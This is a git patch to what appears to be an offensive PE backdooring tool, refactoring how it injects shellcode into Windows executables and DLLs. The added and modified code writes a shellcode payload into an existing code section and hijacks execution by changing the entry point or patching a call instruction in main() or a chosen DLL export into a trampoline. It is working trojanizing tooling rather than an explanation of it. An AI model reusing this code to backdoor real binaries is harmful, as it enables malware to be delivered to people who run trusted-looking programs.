From a95203e2b528be5e9b8a53682e29090f9213f54e Mon Sep 17 00:00:00 2001 From: Dobin Date: Fri, 12 Apr 2024 22:01:10 +0100 Subject: [PATCH] refactor: better DLL support --- app/views_project.py | 8 +- helper.py | 5 +- model/exehost.py | 2 +- pe/derbackdoorer.py | 188 ++++++++++++------------------------------- pe/superpe.py | 2 +- phases/injector.py | 83 ++++++++++++++----- 6 files changed, 124 insertions(+), 164 deletions(-) diff --git a/app/views_project.py b/app/views_project.py index 5ad6c58..a761134 100644 --- a/app/views_project.py +++ b/app/views_project.py @@ -159,10 +159,10 @@ def build_project(project_name): project = storage.get_project(project_name) - if project.settings.inject_exe_in.endswith(".dll"): - if project.settings.dllfunc == "": - logger.error("DLL injection requires a DLL function name") - return redirect("/project/{}".format(project_name), code=302) + #if project.settings.inject_exe_in.endswith(".dll"): + # if project.settings.dllfunc == "": + # logger.error("DLL injection requires a DLL function name") + # return redirect("/project/{}".format(project_name), code=302) project.settings.try_start_final_infected_exe = False prepare_project(project_name, project.settings) diff --git a/helper.py b/helper.py index 66b8dac..23734e9 100644 --- a/helper.py +++ b/helper.py @@ -54,7 +54,8 @@ def run_exe(exefile, dllfunc="", check=True): if exefile.endswith(".dll"): if dllfunc == "": - raise Exception("---[ No DLL function specified") + dllfunc = "dllMain" + #raise Exception("---[ No DLL function specified") args = [ "rundll32.exe", "{},{}".format(exefile, dllfunc) ] elif exefile.endswith(".exe"): args = [ exefile ] @@ -65,6 +66,8 @@ def run_exe(exefile, dllfunc="", check=True): def run_process_checkret(args, check=True): + logger.info("--[ Run process: {}".format(" ".join(args))) + ret = subprocess.CompletedProcess("", 666) try: ret = subprocess.run(args, capture_output=True) diff --git a/model/exehost.py b/model/exehost.py index cd8eb30..de46231 100644 --- a/model/exehost.py +++ b/model/exehost.py @@ -40,7 +40,7 @@ class ExeHost(): if self.superpe.arch != "x64": raise Exception("Binary is not 64bit: {}".format(self.filepath)) - self.ep = self.superpe.get_entyrpoint() + self.ep = self.superpe.get_entrypoint() self.ep_raw = self.superpe.get_physical_address(self.ep) # image base diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py index d233c77..5ff444f 100644 --- a/pe/derbackdoorer.py +++ b/pe/derbackdoorer.py @@ -27,173 +27,85 @@ class PeBackdoor: # Working self.shellcodeOffset: int = 0 # from start of the file self.shellcodeOffsetRel: int = 0 # from start of the code section + self.shellcodeAddr: int = 0 self.backdoorOffsetRel: int = 0 # from start of the code section - - - def injectShellcode(self, dllfunc=""): - sect = self.superpe.get_code_section() - if sect == None: - logger.error('Could not find code section in input PE file!') - return False - sect_name = sect.Name.decode().rstrip('\x00') - sect_size = sect.Misc_VirtualSize # Better than: SizeOfRawData - logger.debug(f'Backdooring {sect_name} section.') - - if sect_size < len(self.shellcodeData): - logger.critical(f'''Input shellcode is too large to fit into target PE executable code section! -Shellcode size : {len(self.shellcodeData)} -Code section size : {sect_size} -''') - - if self.superpe.is_dll(): - offset = self.getExportEntryPoint(dllfunc) - logger.info("--[ Inserting shellcode into DLL at offset 0x{:X} (in {})".format( - offset, sect_name - )) - else: - offset = int((sect_size - len(self.shellcodeData)) / 2) - logger.info("--[ Inserting shellcode into EXE at offset 0x{:X} (in {})".format( - offset, sect_name - )) - - self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData) - self.shellcodeOffset = offset - self.shellcodeOffsetRel = offset - sect.PointerToRawData - - rva = self.superpe.pe.get_rva_from_offset(offset) - - p = sect.PointerToRawData + sect.SizeOfRawData - 64 - graph = textwrap.indent(f''' -Beginning of {sect_name}: -{textwrap.indent(hexdump(self.superpe.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")} - -Injected shellcode in the middle of {sect_name}: -{hexdump(self.shellcodeData, offset, 64)} - -Trailing {sect_name} bytes: -{hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)} -''', '\t') - - logger.info(f'---[ Shellcode injected into existing code section at RVA 0x{rva:X}') - logger.debug(graph) - return True - def setupShellcodeEntryPoint(self): - if self.carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: - rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) - self.superpe.set_entrypoint(rva) - - logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}') - return True - - elif self.carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: - return self.backdoorEntryPoint() - - #elif self.carrier_invoke_style == int(PeBackdoor.Supportedcarrier_invoke_styles.HijackExport): - # addr = self.getExportEntryPoint() - # if addr == -1: - # logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!') - # - # return self.backdoorEntryPoint(addr) - - return False - - - def getExportEntryPoint(self, exportName): + def getExportEntryPoint(self, exportName: str): dec = lambda x: '???' if x is None else x.decode() - - if len(exportName) == 0: - raise Exception('Export name not specified! Specify DLL Exported function name to hijack') - d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]] self.superpe.pe.parse_data_directories(directories=d) if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0: - logger.error('No DLL exports found! Specify existing DLL Exported function') - return -1 + raise Exception('No DLL exports found!') exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols] - + chosen_export = None for export in exports: - logger.debug(f'DLL Export: {export[0]} {export[1]}') + #logger.debug(f'DLL Export: {export[0]} {export[1]}') if export[1].lower() == exportName.lower(): - - addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address - logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:X} . Attempting to hijack it...') - return addr - - return -1 - - - def getRandomExport(self, choose_random=False): - dec = lambda x: '???' if x is None else x.decode() - d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]] - self.superpe.pe.parse_data_directories(directories=d) - - if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0: - raise Exception('No DLL exports found! Specify existing DLL Exported function') - - exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols] - export = exports[0] - if choose_random: - export = exports[0] - - name = export[1] - addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address + chosen_export = export + break + #export = exports[0] + #if choose_random: + # export = exports[0] + logger.info("Export: {} {}".format(chosen_export[0], chosen_export[1])) + name = chosen_export[1] + #addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address + for exp in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols: + #logger.info("-- {} {}".format(hex(exp.address), exp.name.decode())) + if exp.name.decode() == name: + #print(hex(exp.address), exp.name.decode()) + addr = exp.address + logger.info(f'Using DLL Export "{name}" at RVA 0x{addr:X} . Attempting to hijack it...') - return name + + return addr - def backdoorEntryPoint(self, addr = -1): - imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase - self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase - - cs = None - ks = None - - if self.superpe.arch == 'x86': - cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32 + capstone.CS_MODE_LITTLE_ENDIAN) - ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32 + keystone.KS_MODE_LITTLE_ENDIAN) - else: - cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN) - ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN) + def backdoor_function(self, function_addr, shellcode_addr): + #imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase + #self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase + cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN) + ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN) cs.detail = True - ep = addr + #if addr == -1: + # ep = self.superpe.get_entrypoint() + # logger.info("--[ BackdoorEntryPoint(): Use Entry Point 0x{:X}".format(ep)) + #else: + # ep = addr + # logger.info("--[ BackdoorEntryPoint(): Use Addr 0x{:X}".format(ep)) - if addr == -1: - ep = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint - - ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase - data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128] - offset = 0 - - logger.debug('Entry Point disasm:') + #ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase + #data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128] + #offset = 0 + #logger.debug('Entry Point disasm:') disasmData = self.superpe.pe.get_memory_mapped_image() - output = self.superpe.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction) + output = self.superpe.disasmBytes(cs, ks, disasmData, function_addr, 128, self.backdoorInstruction) # store offset... by calculating it first FUCK section = self.superpe.get_code_section() self.backdoorOffsetRel = output - section.VirtualAddress - if output != 0: - logger.debug('Now disasm looks like follows: ') + if False: + if output != 0: + logger.debug('Now disasm looks like follows: ') - disasmData = self.superpe.pe.get_memory_mapped_image() - self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3) + disasmData = self.superpe.pe.get_memory_mapped_image() + self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3) - logger.debug('\n[>] Inserted backdoor code: ') - for instr in cs.disasm(bytes(self.compiledTrampoline), output): - self.superpe.printInstr(instr, 1) + logger.debug('\n[>] Inserted backdoor code: ') + for instr in cs.disasm(bytes(self.compiledTrampoline), output): + self.superpe.printInstr(instr, 1) - logger.debug('') - self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3) + logger.debug('') + self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3) - else: - logger.error('Did not find suitable candidate for Entry Point branch hijack!') + else: + logger.error('Did not find suitable candidate for Entry Point branch hijack!') return output @@ -222,7 +134,7 @@ Trailing {sect_name} bytes: found |= instr.mnemonic.lower() == 'call' if found: - logger.info(f'--[ Backdooring entry point {instr.mnemonic.upper()} instruction at RVA 0x{instr.address:X} into:') + logger.info(f'---[ Backdooring entry point {instr.mnemonic.upper()} instruction at RVA 0x{instr.address:X} into:') jump = random.choice([ f'CALL {reg}', diff --git a/pe/superpe.py b/pe/superpe.py index 1f7d5ea..2790a3a 100644 --- a/pe/superpe.py +++ b/pe/superpe.py @@ -237,7 +237,7 @@ class SuperPe(): ## Helpers - def get_entyrpoint(self) -> int: + def get_entrypoint(self) -> int: return self.pe.OPTIONAL_HEADER.AddressOfEntryPoint def set_entrypoint(self, entrypoint: int): diff --git a/phases/injector.py b/phases/injector.py index 1c6a44a..506abde 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -44,25 +44,72 @@ def inject_exe( superpe = SuperPe(exe_in) pe_backdoorer = PeBackdoor(superpe, main_shc, carrier_invoke_style) - if superpe.is_dll() and settings.dllfunc == "": - raise Exception("DLL injection requires a DLL function name") - - if not pe_backdoorer.injectShellcode(dllfunc=settings.dllfunc): - logger.error('Could not inject shellcode into PE file!') - return False - - if True: # not superpe.is_dll(): - if not pe_backdoorer.setupShellcodeEntryPoint(): - logger.error('Could not setup shellcode launch within PE file!') - return False - - logger.info("--[ Rewrite placeholders with their data") - if source_style == FunctionInvokeStyle.iat_reuse: - injected_fix_iat(superpe, project.carrier, project.exe_host) - + # Find a nice location for the shellcode + shellcode_offset: int = 0 + if superpe.is_dll(): # DLL + shellcode_offset = 0 + else: # EXE + pass if True: - injected_fix_data(superpe, project.carrier, project.exe_host) + sect = superpe.get_code_section() + if sect == None: + raise Exception('Could not find code section in input PE file!') + sect_name = sect.Name.decode().rstrip('\x00') + sect_size = sect.Misc_VirtualSize # Better than: SizeOfRawData + if sect_size < l: + raise Exception("Shellcode too large: {} > {}".format( + l, sect_size + )) + shellcode_offset = int((sect_size - l) / 2) + shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset) + logger.info("--( Inject: Shellcode rva:0x{:X} offset:0x{:X}".format( + shellcode_rva, shellcode_offset)) + + # Copy the shellcode + superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc) + + # HACK + pe_backdoorer.shellcodeOffset = shellcode_offset + pe_backdoorer.shellcodeOffsetRel = shellcode_offset - sect.PointerToRawData + pe_backdoorer.shellcodeAddr = shellcode_rva + superpe.pe.OPTIONAL_HEADER.ImageBase + + # rewire flow + if superpe.is_dll() and settings.dllfunc != "": + logger.info("---( Rewire: DLL function: {} ".format(settings.dllfunc)) + + if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: + raise Exception("--( Inject DLL: Change Entry Point unsupported when set ".format( + settings.dllfunc)) + + elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: + addr = pe_backdoorer.getExportEntryPoint(settings.dllfunc) + + logger.info("--( Inject DLL: Patch {} (0x{:X})".format( + settings.dllfunc, addr)) + pe_backdoorer.backdoor_function(addr, shellcode_rva) + + else: # EXE + logger.info("---( Rewire: EXE") + + if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: + logger.info("--( Inject EXE: Change Entry Point to 0x{:X}".format( + shellcode_rva)) + superpe.set_entrypoint(shellcode_rva) + + elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: + addr = superpe.get_entrypoint() + logger.info("--( Inject EXE: Patch main() (0x{:X})".format( + addr)) + pe_backdoorer.backdoor_function(addr, shellcode_rva) + + if False: + if source_style == FunctionInvokeStyle.iat_reuse: + injected_fix_iat(superpe, project.carrier, project.exe_host) + if True: + injected_fix_data(superpe, project.carrier, project.exe_host) + + # We done superpe.write_pe_to_file(exe_out) # verify and log @@ -74,8 +121,6 @@ def inject_exe( if config.debug: observer.add_code_file("exe_extracted_loader", in_code) observer.add_code_file("exe_extracted_jmp", jmp_code) - #if in_code != shellcode: - # raise Exception("Shellcode injection error") def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):